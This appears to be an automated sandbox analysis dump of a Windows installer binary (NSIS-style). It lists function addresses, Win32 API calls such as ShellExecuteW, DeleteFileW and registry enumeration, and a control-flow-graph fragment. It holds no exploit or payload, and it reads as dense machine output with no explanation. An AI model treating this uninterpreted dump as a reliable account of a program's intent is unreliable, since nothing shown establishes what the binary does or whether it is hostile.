RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3819 406009 lstrcpynW 3620->3819 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3805 405047 OleInitialize 3626->3805 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3965 403c83 3640->3965 3641->3640 3647 405cb5 3646->3647 3648 403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4022 406009 lstrcpynW 3651->4022 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4023 405e50 GetFileAttributesW CreateFileW 3674->4023 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3696 406812 3683->3696 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4026 406009 lstrcpynW 3684->4026 3685->3527 3685->3529 3687 4068d3 GetVersion 3699 4068e0 3687->3699 3688 406a46 lstrlenW 3688->3696 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3699 3693 406952 GetSystemDirectoryW 3693->3699 3694 406965 GetWindowsDirectoryW 3694->3699 3695 406038 5 API calls 3695->3696 3696->3684 3696->3687 3696->3688 3696->3689 3696->3695 4024 405f51 wsprintfW 3696->4024 4025 406009 lstrcpynW 3696->4025 3697 406805 10 API calls 3697->3699 3698 4069df lstrcatW 3698->3696 3699->3692 3699->3693 3699->3694 3699->3696 3699->3697 3699->3698 3700 406999 SHGetSpecialFolderLocation 3699->3700 3700->3699 3701 4069b1 SHGetPathFromIDListW CoTaskMemFree 3700->3701 3701->3699 3703 4062fc 3 API calls 3702->3703 3704 406c6f 3703->3704 3706 406c90 3704->3706 4027 406a99 lstrcpyW 3704->4027 3706->3529 3708 405c7a 3707->3708 3709 405c6e CloseHandle 3707->3709 3708->3529 3709->3708 3711 40139d 80 API calls 3710->3711 3712 401432 3711->3712 3712->3495 3719 406045 3713->3719 3714 4060bb 3715 4060c1 CharPrevW 3714->3715 3717 4060e1 3714->3717 3715->3714 3716 4060ae CharNextW 3716->3714 3716->3719 3717->3549 3718 405d06 CharNextW 3718->3719 3719->3714 3719->3716 3719->3718 3720 40609a CharNextW 3719->3720 3721 4060a9 CharNextW 3719->3721 3720->3719 3721->3716 3723 4037ea CreateDirectoryW 3722->3723 3724 40673f lstrcatW 3722->3724 3725 405e7f 3723->3725 3724->3723 3726 405e8c GetTickCount GetTempFileNameW 3725->3726 3727 405ec2 3726->3727 3728 4037fe 3726->3728 3727->3726 3727->3728 3728->3475 3729->3556 3730->3558 3732 406760 3731->3732 3733 4035f3 3732->3733 3734 406766 CharPrevW 3732->3734 3735 406009 lstrcpynW 3733->3735 3734->3732 3734->3733 3735->3562 3737 403357 3736->3737 3737->3576 3739 4032f3 3738->3739 3740 4032db 3738->3740 3743 403303 GetTickCount 3739->3743 3744 4032fb 3739->3744 3741 4032e4 DestroyWindow 3740->3741 3742 4032eb 3740->3742 3741->3742 3742->3565 3746 403311 CreateDialogParamW ShowWindow 3743->3746 3747 403334 3743->3747 3773 406332 3744->3773 3746->3747 3747->3565 3749->3571 3752 403398 3750->3752 3751 4033c3 3754 403336 ReadFile 3751->3754 3752->3751 3795 403368 SetFilePointer 3752->3795 3755 4033ce 3754->3755 3756 4033e7 GetTickCount 3755->3756 3757 403518 3755->3757 3759 4033d2 3755->3759 3769 4033fa 3756->3769 3758 40351c 3757->3758 3763 403540 3757->3763 3760 403336 ReadFile 3758->3760 3759->3580 3760->3759 3761 403336 ReadFile 3761->3763 3762 403336 ReadFile 3762->3769 3763->3759 3763->3761 3764 40355f WriteFile 3763->3764 3764->3759 3765 403574 3764->3765 3765->3759 3765->3763 3767 40345c GetTickCount 3767->3769 3768 403485 MulDiv wsprintfW 3784 404f72 3768->3784 3769->3759 3769->3762 3769->3767 3769->3768 3771 4034c9 WriteFile 3769->3771 3777 407312 3769->3777 3771->3759 3771->3769 3772->3572 3774 40634f PeekMessageW 3773->3774 3775 406345 DispatchMessageW 3774->3775 3776 403301 3774->3776 3775->3774 3776->3565 3778 407332 3777->3778 3779 40733a 3777->3779 3778->3769 3779->3778 3780 4073c2 GlobalFree 3779->3780 3781 4073cb GlobalAlloc 3779->3781 3782 407443 GlobalAlloc 3779->3782 3783 40743a GlobalFree 3779->3783 3780->3781 3781->3778 3781->3779 3782->3778 3782->3779 3783->3782 3785 404f8b 3784->3785 3794 40502f 3784->3794 3786 404fa9 lstrlenW 3785->3786 3787 406805 18 API calls 3785->3787 3788 404fd2 3786->3788 3789 404fb7 lstrlenW 3786->3789 3787->3786 3791 404fe5 3788->3791 3792 404fd8 SetWindowTextW 3788->3792 3790 404fc9 lstrcatW 3789->3790 3789->3794 3790->3788 3793 404feb SendMessageW SendMessageW SendMessageW 3791->3793 3791->3794 3792->3791 3793->3794 3794->3769 3795->3751 3797 403ea9 3796->3797 3825 405f51 wsprintfW 3797->3825 3799 403f1d 3800 406805 18 API calls 3799->3800 3801 403f29 SetWindowTextW 3800->3801 3803 403f44 3801->3803 3802 403f5f 3802->3595 3803->3802 3804 406805 18 API calls 3803->3804 3804->3803 3826 403daf 3805->3826 3807 40506a 3810 4062a3 11 API calls 3807->3810 3812 405095 3807->3812 3829 40139d 3807->3829 3808 403daf SendMessageW 3809 4050a5 OleUninitialize 3808->3809 3809->3632 3810->3807 3812->3808 3813->3592 3815 405f07 RegQueryValueExW 3814->3815 3816 405989 3814->3816 3817 405f29 RegCloseKey 3815->3817 3816->3590 3816->3591 3817->3816 3819->3597 3964 406009 lstrcpynW 3820->3964 3822 403e88 3823 406722 3 API calls 3822->3823 3824 403e8e lstrcatW 3823->3824 3824->3615 3825->3799 3827 403dc7 3826->3827 3828 403db8 SendMessageW 3826->3828 3827->3807 3828->3827 3832 4013a4 3829->3832 3830 401410 3830->3807 3832->3830 3833 4013dd MulDiv SendMessageW 3832->3833 3834 4015a0 3832->3834 3833->3832 3835 4015fa 3834->3835 3914 40160c 3834->3914 3836 401601 3835->3836 3837 401742 3835->3837 3838 401962 3835->3838 3839 4019ca 3835->3839 3840 40176e 3835->3840 3841 401650 3835->3841 3842 4017b1 3835->3842 3843 401672 3835->3843 3844 401693 3835->3844 3845 401616 3835->3845 3846 4016d6 3835->3846 3847 401736 3835->3847 3848 401897 3835->3848 3849 4018db 3835->3849 3850 40163c 3835->3850 3851 4016bd 3835->3851 3835->3914 3864 4062a3 11 API calls 3836->3864 3856 401751 ShowWindow 3837->3856 3857 401758 3837->3857 3861 40145c 18 API calls 3838->3861 3854 40145c 18 API calls 3839->3854 3858 40145c 18 API calls 3840->3858 3881 4062a3 11 API calls 3841->3881 3947 40145c 3842->3947 3859 40145c 18 API calls 3843->3859 3941 401446 3844->3941 3853 40145c 18 API calls 3845->3853 3870 401446 18 API calls 3846->3870 3846->3914 3847->3914 3963 405f51 wsprintfW 3847->3963 3860 40145c 18 API calls 3848->3860 3865 40145c 18 API calls 3849->3865 3855 401647 PostQuitMessage 3850->3855 3850->3914 3852 4062a3 11 API calls 3851->3852 3867 4016c7 SetForegroundWindow 3852->3867 3868 40161c 3853->3868 3869 4019d1 SearchPathW 3854->3869 3855->3914 3856->3857 3871 401765 ShowWindow 3857->3871 3857->3914 3872 401775 3858->3872 3873 401678 3859->3873 3874 40189d 3860->3874 3875 401968 GetFullPathNameW 3861->3875 3864->3914 3866 4018e2 3865->3866 3878 40145c 18 API calls 3866->3878 3867->3914 3879 4062a3 11 API calls 3868->3879 3869->3914 3870->3914 3871->3914 3882 4062a3 11 API calls 3872->3882 3883 4062a3 11 API calls 3873->3883 3959 4062d5 FindFirstFileW 3874->3959 3885 40197f 3875->3885 3927 4019a1 3875->3927 3877 40169a 3944 4062a3 lstrlenW wvsprintfW 3877->3944 3888 4018eb 3878->3888 3889 401627 3879->3889 3890 401664 3881->3890 3891 401785 SetFileAttributesW 3882->3891 3892 401683 3883->3892 3909 4062d5 2 API calls 3885->3909 3885->3927 3886 4062a3 11 API calls 3894 4017c9 3886->3894 3897 40145c 18 API calls 3888->3897 3898 404f72 25 API calls 3889->3898 3899 40139d 65 API calls 3890->3899 3900 40179a 3891->3900 3891->3914 3907 404f72 25 API calls 3892->3907 3952 405d59 CharNextW CharNextW 3894->3952 3896 4019b8 GetShortPathNameW 3896->3914 3905 4018f5 3897->3905 3898->3914 3899->3914 3906 4062a3 11 API calls 3900->3906 3901 4018c2 3910 4062a3 11 API calls 3901->3910 3902 4018a9 3908 4062a3 11 API calls 3902->3908 3912 4062a3 11 API calls 3905->3912 3906->3914 3907->3914 3908->3914 3913 401991 3909->3913 3910->3914 3911 4017d4 3915 401864 3911->3915 3918 405d06 CharNextW 3911->3918 3936 4062a3 11 API calls 3911->3936 3916 401902 MoveFileW 3912->3916 3913->3927 3962 406009 lstrcpynW 3913->3962 3914->3832 3915->3892 3917 40186e 3915->3917 3919 401912 3916->3919 3920 40191e 3916->3920 3921 404f72 25 API calls 3917->3921 3923 4017e6 CreateDirectoryW 3918->3923 3919->3892 3925 401942 3920->3925 3930 4062d5 2 API calls 3920->3930 3926 401875 3921->3926 3923->3911 3924 4017fe GetLastError 3923->3924 3928 401827 GetFileAttributesW 3924->3928 3929 40180b GetLastError 3924->3929 3935 4062a3 11 API calls 3925->3935 3958 406009 lstrcpynW 3926->3958 3927->3896 3927->3914 3928->3911 3932 4062a3 11 API calls 3929->3932 3933 401929 3930->3933 3932->3911 3933->3925 3938 406c68 42 API calls 3933->3938 3934 401882 SetCurrentDirectoryW 3934->3914 3937 40195c 3935->3937 3936->3911 3937->3914 3939 401936 3938->3939 3940 404f72 25 API calls 3939->3940 3940->3925 3942 406805 18 API calls 3941->3942 3943 401455 3942->3943 3943->3877 3945 4060e7 9 API calls 3944->3945 3946 4016a7 Sleep 3945->3946 3946->3914 3948 406805 18 API calls 3947->3948 3949 401488 3948->3949 3950 401497 3949->3950 3951 406038 5 API calls 3949->3951 3950->3886 3951->3950 3953 405d76 3952->3953 3954 405d88 3952->3954 3953->3954 3955 405d83 CharNextW 3953->3955 3956 405dac 3954->3956 3957 405d06 CharNextW 3954->3957 3955->3956 3956->3911 3957->3954 3958->3934 3960 4018a5 3959->3960 3961 4062eb FindClose 3959->3961 3960->3901 3960->3902 3961->3960 3962->3927 3963->3914 3964->3822 3966 403c91 3965->3966 3967 403876 3966->3967 3968 403c96 FreeLibrary GlobalFree 3966->3968 3969 406c9b 3967->3969 3968->3967 3968->3968 3970 40677e 18 API calls 3969->3970 3971 406cae 3970->3971 3972 406cb7 DeleteFileW 3971->3972 3973 406cce 3971->3973 4013 403882 CoUninitialize 3972->4013 3974 406e4b 3973->3974 4017 406009 lstrcpynW 3973->4017 3980 4062d5 2 API calls 3974->3980 4002 406e58 3974->4002 3974->4013 3976 406cf9 3977 406d03 lstrcatW 3976->3977 3978 406d0d 3976->3978 3979 406d13 3977->3979 3981 406751 2 API calls 3978->3981 3983 406d23 lstrcatW 3979->3983 3984 406d19 3979->3984 3982 406e64 3980->3982 3981->3979 3987 406722 3 API calls 3982->3987 3982->4013 3986 406d2b lstrlenW FindFirstFileW 3983->3986 3984->3983 3984->3986 3985 4062a3 11 API calls 3985->4013 3988 406e3b 3986->3988 3992 406d52 3986->3992 3989 406e6e 3987->3989 3988->3974 3991 4062a3 11 API calls 3989->3991 3990 405d06 CharNextW 3990->3992 3993 406e79 3991->3993 3992->3990 3996 406e18 FindNextFileW 3992->3996 4005 406c9b 72 API calls 3992->4005 4012 404f72 25 API calls 3992->4012 4014 4062a3 11 API calls 3992->4014 4015 404f72 25 API calls 3992->4015 4016 406c68 42 API calls 3992->4016 4018 406009 lstrcpynW 3992->4018 4019 405e30 GetFileAttributesW 3992->4019 3994 405e30 2 API calls 3993->3994 3995 406e81 RemoveDirectoryW 3994->3995 3999 406ec4 3995->3999 4000 406e8d 3995->4000 3996->3992 3998 406e30 FindClose 3996->3998 3998->3988 4001 404f72 25 API calls 3999->4001 4000->4002 4003 406e93 4000->4003 4001->4013 4002->3985 4004 4062a3 11 API calls 4003->4004 4006 406e9d 4004->4006 4005->3992 4008 404f72 25 API calls 4006->4008 4010 406ea7 4008->4010 4011 406c68 42 API calls 4010->4011 4011->4013 4012->3996 4013->3491 4013->3492 4014->3992 4015->3992 4016->3992 4017->3976 4018->3992 4020 405e4d DeleteFileW 4019->4020 4021 405e3f SetFileAttributesW 4019->4021 4020->3992 4021->4020 4022->3653 4023->3677 4024->3696 4025->3696 4026->3685 4028 406ae7 GetShortPathNameW 4027->4028 4029 406abe 4027->4029 4030 406b00 4028->4030 4031 406c62 4028->4031 4053 405e50 GetFileAttributesW CreateFileW 4029->4053 4030->4031 4033 406b08 WideCharToMultiByte 4030->4033 4031->3706 4033->4031 4035 406b25 WideCharToMultiByte 4033->4035 4034 406ac7 CloseHandle GetShortPathNameW 4034->4031 4036 406adf 4034->4036 4035->4031 4037 406b3d wsprintfA 4035->4037 4036->4028 4036->4031 4038 406805 18 API calls 4037->4038 4039 406b69 4038->4039 4054 405e50 GetFileAttributesW CreateFileW 4039->4054 4041 406b76 4041->4031 4042 406b83 GetFileSize GlobalAlloc 4041->4042 4043 406ba4 ReadFile 4042->4043 4044 406c58 CloseHandle 4042->4044 4043->4044 4045 406bbe 4043->4045 4044->4031 4045->4044 4055 405db6 lstrlenA 4045->4055 4048 406bd7 lstrcpyA 4051 406bf9 4048->4051 4049 406beb 4050 405db6 4 API calls 4049->4050 4050->4051 4052 406c30 SetFilePointer WriteFile GlobalFree 4051->4052 4052->4044 4053->4034 4054->4041 4056 405df7 lstrlenA 4055->4056 4057 405dd0 lstrcmpiA 4056->4057 4058 405dff 4056->4058 4057->4058 4059 405dee CharNextA 4057->4059 4058->4048 4058->4049 4059->4056 4940 402a84 4941 401553 19 API calls 4940->4941 4942 402a8e 4941->4942 4943 401446 18 API calls 4942->4943 4944 402a98 4943->4944 4945 401a13 4944->4945 4946 402ab2 RegEnumKeyW 4944->4946 4947 402abe RegEnumValueW 4944->4947 4948 402a7e 4946->4948 4947->4945 4947->4948 4948->4945 4949 4029e4 RegCloseKey 4948->4949 4949->4945 4950 402c8a 4951 402ca2 4950->4951 4952 402c8f 4950->4952 4954 40145c 18 API calls 4951->4954 4953 401446 18 API calls 4952->4953 4956 402c97 4953->4956 4955 402ca9 lstrlenW 4954->4955 4955->4956 4957 402ccb WriteFile 4956->4957 4958 401a13 4956->4958 4957->4958 4959 40400d 4960 40406a 4959->4960 4961 40401a lstrcpynA lstrlenA 4959->4961 4961->4960 4962 40404b 4961->4962 4962->4960 4963 404057 GlobalFree 4962->4963 4963->4960 4964 401d8e 4965 40145c 18 API calls 4964->4965 4966 401d95 ExpandEnvironmentStringsW 4965->4966 4967 401da8 4966->4967 4969 401db9 4966->4969 4968 401dad lstrcmpW 4967->4968 4967->4969 4968->4969 4970 401e0f 4971 401446 18 API calls 4970->4971 4972 401e17 4971->4972 4973 401446 18 API calls 4972->4973 4974 401e21 4973->4974 4975 4030e3 4974->4975 4977 405f51 wsprintfW 4974->4977 4977->4975 4978 402392 4979 40145c 18 API calls 4978->4979 4980 402399 4979->4980 4983 4071f8 4980->4983 4984 406ed2 25 API calls 4983->4984 4985 407218 4984->4985 4986 407222 lstrcpynW lstrcmpW 4985->4986 4987 4023a7 4985->4987 4988 407254 4986->4988 4989 40725a lstrcpynW 4986->4989 4988->4989 4989->4987 4060 402713 4075 406009 lstrcpynW 4060->4075 4062 40272c 4076 406009 lstrcpynW 4062->4076 4064 402738 4065 40145c 18 API calls 4064->4065 4067 402743 4064->4067 4065->4067 4066 402752 4069 40145c 18 API calls 4066->4069 4071 402761 4066->4071 4067->4066 4068 40145c 18 API calls 4067->4068 4068->4066 4069->4071 4070 40145c 18 API calls 4072 40276b 4070->4072 4071->4070 4073 4062a3 11 API calls 4072->4073 4074 40277f WritePrivateProfileStringW 4073->4074 4075->4062 4076->4064 4990 402797 4991 40145c 18 API calls 4990->4991 4992 4027ae 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027b7 4993->4994 4995 40145c 18 API calls 4994->4995 4996 4027c0 GetPrivateProfileStringW lstrcmpW 4995->4996 4997 402e18 4998 40145c 18 API calls 4997->4998 4999 402e1f FindFirstFileW 4998->4999 5000 402e32 4999->5000 5005 405f51 wsprintfW 5000->5005 5002 402e43 5006 406009 lstrcpynW 5002->5006 5004 402e50 5005->5002 5006->5004 5007 401e9a 5008 40145c 18 API calls 5007->5008 5009 401ea1 5008->5009 5010 401446 18 API calls 5009->5010 5011 401eab wsprintfW 5010->5011 4287 401a1f 4288 40145c 18 API calls 4287->4288 4289 401a26 4288->4289 4290 4062a3 11 API calls 4289->4290 4291 401a49 4290->4291 4292 401a64 4291->4292 4293 401a5c 4291->4293 4341 406009 lstrcpynW 4292->4341 4340 406009 lstrcpynW 4293->4340 4296 401a62 4300 406038 5 API calls 4296->4300 4297 401a6f 4298 406722 3 API calls 4297->4298 4299 401a75 lstrcatW 4298->4299 4299->4296 4302 401a81 4300->4302 4301 4062d5 2 API calls 4301->4302 4302->4301 4303 405e30 2 API calls 4302->4303 4305 401a98 CompareFileTime 4302->4305 4306 401ba9 4302->4306 4310 4062a3 11 API calls 4302->4310 4314 406009 lstrcpynW 4302->4314 4320 406805 18 API calls 4302->4320 4327 405ca0 MessageBoxIndirectW 4302->4327 4331 401b50 4302->4331 4338 401b5d 4302->4338 4339 405e50 GetFileAttributesW CreateFileW 4302->4339 4303->4302 4305->4302 4307 404f72 25 API calls 4306->4307 4309 401bb3 4307->4309 4308 404f72 25 API calls 4311 401b70 4308->4311 4312 40337f 37 API calls 4309->4312 4310->4302 4315 4062a3 11 API calls 4311->4315 4313 401bc6 4312->4313 4316 4062a3 11 API calls 4313->4316 4314->4302 4322 401b8b 4315->4322 4317 401bda 4316->4317 4318 401be9 SetFileTime 4317->4318 4319 401bf8 CloseHandle 4317->4319 4318->4319 4321 401c09 4319->4321 4319->4322 4320->4302 4323 401c21 4321->4323 4324 401c0e 4321->4324 4326 406805 18 API calls 4323->4326 4325 406805 18 API calls 4324->4325 4328 401c16 lstrcatW 4325->4328 4329 401c29 4326->4329 4327->4302 4328->4329 4330 4062a3 11 API calls 4329->4330 4332 401c34 4330->4332 4333 401b93 4331->4333 4334 401b53 4331->4334 4335 405ca0 MessageBoxIndirectW 4332->4335 4336 4062a3 11 API calls 4333->4336 4337 4062a3 11 API calls 4334->4337 4335->4322 4336->4322 4337->4338 4338->4308 4339->4302 4340->4296 4341->4297 5012 40209f GetDlgItem GetClientRect 5013 40145c 18 API calls 5012->5013 5014 4020cf LoadImageW SendMessageW 5013->5014 5015 4030e3 5014->5015 5016 4020ed DeleteObject 5014->5016 5016->5015 5017 402b9f 5018 401446 18 API calls 5017->5018 5023 402ba7 5018->5023 5019 402c4a 5020 402bdf ReadFile 5022 402c3d 5020->5022 5020->5023 5021 401446 18 API calls 5021->5022 5022->5019 5022->5021 5029 402d17 ReadFile 5022->5029 5023->5019 5023->5020 5023->5022 5024 402c06 MultiByteToWideChar 5023->5024 5025 402c3f 5023->5025 5027 402c4f 5023->5027 5024->5023 5024->5027 5030 405f51 wsprintfW 5025->5030 5027->5022 5028 402c6b SetFilePointer 5027->5028 5028->5022 5029->5022 5030->5019 5031 402b23 GlobalAlloc 5032 402b39 5031->5032 5033 402b4b 5031->5033 5034 401446 18 API calls 5032->5034 5035 40145c 18 API calls 5033->5035 5036 402b41 5034->5036 5037 402b52 WideCharToMultiByte lstrlenA 5035->5037 5038 402b93 5036->5038 5039 402b84 WriteFile 5036->5039 5037->5036 5039->5038 5040 402384 GlobalFree 5039->5040 5040->5038 5042 4044a5 5043 404512 5042->5043 5044 4044df 5042->5044 5046 40451f GetDlgItem GetAsyncKeyState 5043->5046 5053 4045b1 5043->5053 5110 405c84 GetDlgItemTextW 5044->5110 5049 40453e GetDlgItem 5046->5049 5056 40455c 5046->5056 5047 4044ea 5050 406038 5 API calls 5047->5050 5048 40469d 5108 404833 5048->5108 5112 405c84 GetDlgItemTextW 5048->5112 5051 403d3f 19 API calls 5049->5051 5052 4044f0 5050->5052 5055 404551 ShowWindow 5051->5055 5058 403e74 5 API calls 5052->5058 5053->5048 5059 406805 18 API calls 5053->5059 5053->5108 5055->5056 5061 404579 SetWindowTextW 5056->5061 5066 405d59 4 API calls 5056->5066 5057 403dca 8 API calls 5062 404847 5057->5062 5063 4044f5 GetDlgItem 5058->5063 5064 40462f SHBrowseForFolderW 5059->5064 5060 4046c9 5065 40677e 18 API calls 5060->5065 5067 403d3f 19 API calls 5061->5067 5068 404503 IsDlgButtonChecked 5063->5068 5063->5108 5064->5048 5069 404647 CoTaskMemFree 5064->5069 5070 4046cf 5065->5070 5071 40456f 5066->5071 5072 404597 5067->5072 5068->5043 5073 406722 3 API calls 5069->5073 5113 406009 lstrcpynW 5070->5113 5071->5061 5077 406722 3 API calls 5071->5077 5074 403d3f 19 API calls 5072->5074 5075 404654 5073->5075 5078 4045a2 5074->5078 5079 40468b SetDlgItemTextW 5075->5079 5084 406805 18 API calls 5075->5084 5077->5061 5111 403d98 SendMessageW 5078->5111 5079->5048 5080 4046e6 5082 4062fc 3 API calls 5080->5082 5091 4046ee 5082->5091 5083 4045aa 5087 4062fc 3 API calls 5083->5087 5085 404673 lstrcmpiW 5084->5085 5085->5079 5088 404684 lstrcatW 5085->5088 5086 404730 5114 406009 lstrcpynW 5086->5114 5087->5053 5088->5079 5090 404739 5092 405d59 4 API calls 5090->5092 5091->5086 5096 406751 2 API calls 5091->5096 5097 404785 5091->5097 5093 40473f GetDiskFreeSpaceW 5092->5093 5095 404763 MulDiv 5093->5095 5093->5097 5095->5097 5096->5091 5099 4047e2 5097->5099 5100 4043ad 21 API calls 5097->5100 5098 404805 5115 403d85 KiUserCallbackDispatcher 5098->5115 5099->5098 5101 40141d 80 API calls 5099->5101 5102 4047d3 5100->5102 5101->5098 5104 4047e4 SetDlgItemTextW 5102->5104 5105 4047d8 5102->5105 5104->5099 5106 4043ad 21 API calls 5105->5106 5106->5099 5107 404821 5107->5108 5116 403d61 5107->5116 5108->5057 5110->5047 5111->5083 5112->5060 5113->5080 5114->5090 5115->5107 5117 403d74 SendMessageW 5116->5117 5118 403d6f 5116->5118 5117->5108 5118->5117 5119 402da5 5120 4030e3 5119->5120 5121 402dac 5119->5121 5122 401446 18 API calls 5121->5122 5123 402db8 5122->5123 5124 402dbf SetFilePointer 5123->5124 5124->5120 5125 402dcf 5124->5125 5125->5120 5127 405f51 wsprintfW 5125->5127 5127->5120 5128 4030a9 SendMessageW 5129 4030c2 InvalidateRect 5128->5129 5130 4030e3 5128->5130 5129->5130 5131 401cb2 5132 40145c 18 API calls 5131->5132 5133 401c54 5132->5133 5134 4062a3 11 API calls 5133->5134 5137 401c64 5133->5137 5135 401c59 5134->5135 5136 406c9b 81 API calls 5135->5136 5136->5137 4087 4021b5 4088 40145c 18 API calls 4087->4088 4089 4021bb 4088->4089 4090 40145c 18 API calls 4089->4090 4091 4021c4 4090->4091 4092 40145c 18 API calls 4091->4092 4093 4021cd 4092->4093 4094 40145c 18 API calls 4093->4094 4095 4021d6 4094->4095 4096 404f72 25 API calls 4095->4096 4097 4021e2 ShellExecuteW 4096->4097 4098 40221b 4097->4098 4099 40220d 4097->4099 4101 4062a3 11 API calls 4098->4101 4100 4062a3 11 API calls 4099->4100 4100->4098 4102 402230 4101->4102 5145 402238 5146 40145c 18 API calls 5145->5146 5147 40223e 5146->5147 5148 4062a3 11 API calls 5147->5148 5149 40224b 5148->5149 5150 404f72 25 API calls 5149->5150 5151 402255 5150->5151 5152 405c3f 2 API calls 5151->5152 5153 40225b 5152->5153 5154 4062a3 11 API calls 5153->5154 5157 4022ac CloseHandle 5153->5157 5160 40226d 5154->5160 5156 4030e3 5157->5156 5158 402283 WaitForSingleObject 5159 402291 GetExitCodeProcess 5158->5159 5158->5160 5159->5157 5162 4022a3 5159->5162 5160->5157 5160->5158 5161 406332 2 API calls 5160->5161 5161->5158 5164 405f51 wsprintfW 5162->5164 5164->5157 5165 4040b8 5166 4040d3 5165->5166 5174 404201 5165->5174 5170 40410e 5166->5170 5196 403fca WideCharToMultiByte 5166->5196 5167 40426c 5168 404276 GetDlgItem 5167->5168 5169 40433e 5167->5169 5171 404290 5168->5171 5172 4042ff 5168->5172 5175 403dca 8 API calls 5169->5175 5177 403d3f 19 API calls 5170->5177 5171->5172 5180 4042b6 6 API calls 5171->5180 5172->5169 5181 404311 5172->5181 5174->5167 5174->5169 5176 40423b GetDlgItem SendMessageW 5174->5176 5179 404339 5175->5179 5201 403d85 KiUserCallbackDispatcher 5176->5201 5178 40414e 5177->5178 5183 403d3f 19 API calls 5178->5183 5180->5172 5184 404327 5181->5184 5185 404317 SendMessageW 5181->5185 5188 40415b CheckDlgButton 5183->5188 5184->5179 5189 40432d SendMessageW 5184->5189 5185->5184 5186 404267 5187 403d61 SendMessageW 5186->5187 5187->5167 5199 403d85 KiUserCallbackDispatcher 5188->5199 5189->5179 5191 404179 GetDlgItem 5200 403d98 SendMessageW 5191->5200 5193 40418f SendMessageW 5194 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5193->5194 5195 4041ac GetSysColor 5193->5195 5194->5179 5195->5194 5197 404007 5196->5197 5198 403fe9 GlobalAlloc WideCharToMultiByte 5196->5198 5197->5170 5198->5197 5199->5191 5200->5193 5201->5186 4196 401eb9 4197 401f24 4196->4197 4198 401ec6 4196->4198 4199 401f53 GlobalAlloc 4197->4199 4200 401f28 4197->4200 4201 401ed5 4198->4201 4208 401ef7 4198->4208 4202 406805 18 API calls 4199->4202 4207 4062a3 11 API calls 4200->4207 4212 401f36 4200->4212 4203 4062a3 11 API calls 4201->4203 4206 401f46 4202->4206 4204 401ee2 4203->4204 4209 402708 4204->4209 4214 406805 18 API calls 4204->4214 4206->4209 4210 402387 GlobalFree 4206->4210 4207->4212 4218 406009 lstrcpynW 4208->4218 4210->4209 4220 406009 lstrcpynW 4212->4220 4213 401f06 4219 406009 lstrcpynW 4213->4219 4214->4204 4216 401f15 4221 406009 lstrcpynW 4216->4221 4218->4213 4219->4216 4220->4206 4221->4209 5202 4074bb 5204 407344 5202->5204 5203 407c6d 5204->5203 5205 4073c2 GlobalFree 5204->5205 5206 4073cb GlobalAlloc 5204->5206 5207 407443 GlobalAlloc 5204->5207 5208 40743a GlobalFree 5204->5208 5205->5206 5206->5203 5206->5204 5207->5203 5207->5204 5208->5207

                                                                                                          Executed Functions

                                                                                                          Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295windowclipboardmemoryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 0 4050cd-4050e8 1 405295-40529c 0->1 2 4050ee-4051d5 GetDlgItem * 3 call 403d98 call 404476 call 406805 call 4062a3 GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052c6-4052d3 1->3 4 40529e-4052c0 GetDlgItem CreateThread CloseHandle 1->4 35 4051f3-4051f6 2->35 36 4051d7-4051f1 SendMessageW * 2 2->36 6 4052f4-4052fb 3->6 7 4052d5-4052de 3->7 4->3 11 405352-405356 6->11 12 4052fd-405303 6->12 9 4052e0-4052ef ShowWindow * 2 call 403d98 7->9 10 405316-40531f call 403dca 7->10 9->6 22 405324-405328 10->22 11->10 14 405358-40535b 11->14 16 405305-405311 call 403d18 12->16 17 40532b-40533b ShowWindow 12->17 14->10 20 40535d-405370 SendMessageW 14->20 16->10 23 40534b-40534d call 403d18 17->23 24 40533d-405346 call 404f72 17->24 27 405376-405397 CreatePopupMenu call 406805 AppendMenuW 20->27 28 40528e-405290 20->28 23->11 24->23 37 405399-4053aa GetWindowRect 27->37 38 4053ac-4053b2 27->38 28->22 39 405206-40521d call 403d3f 35->39 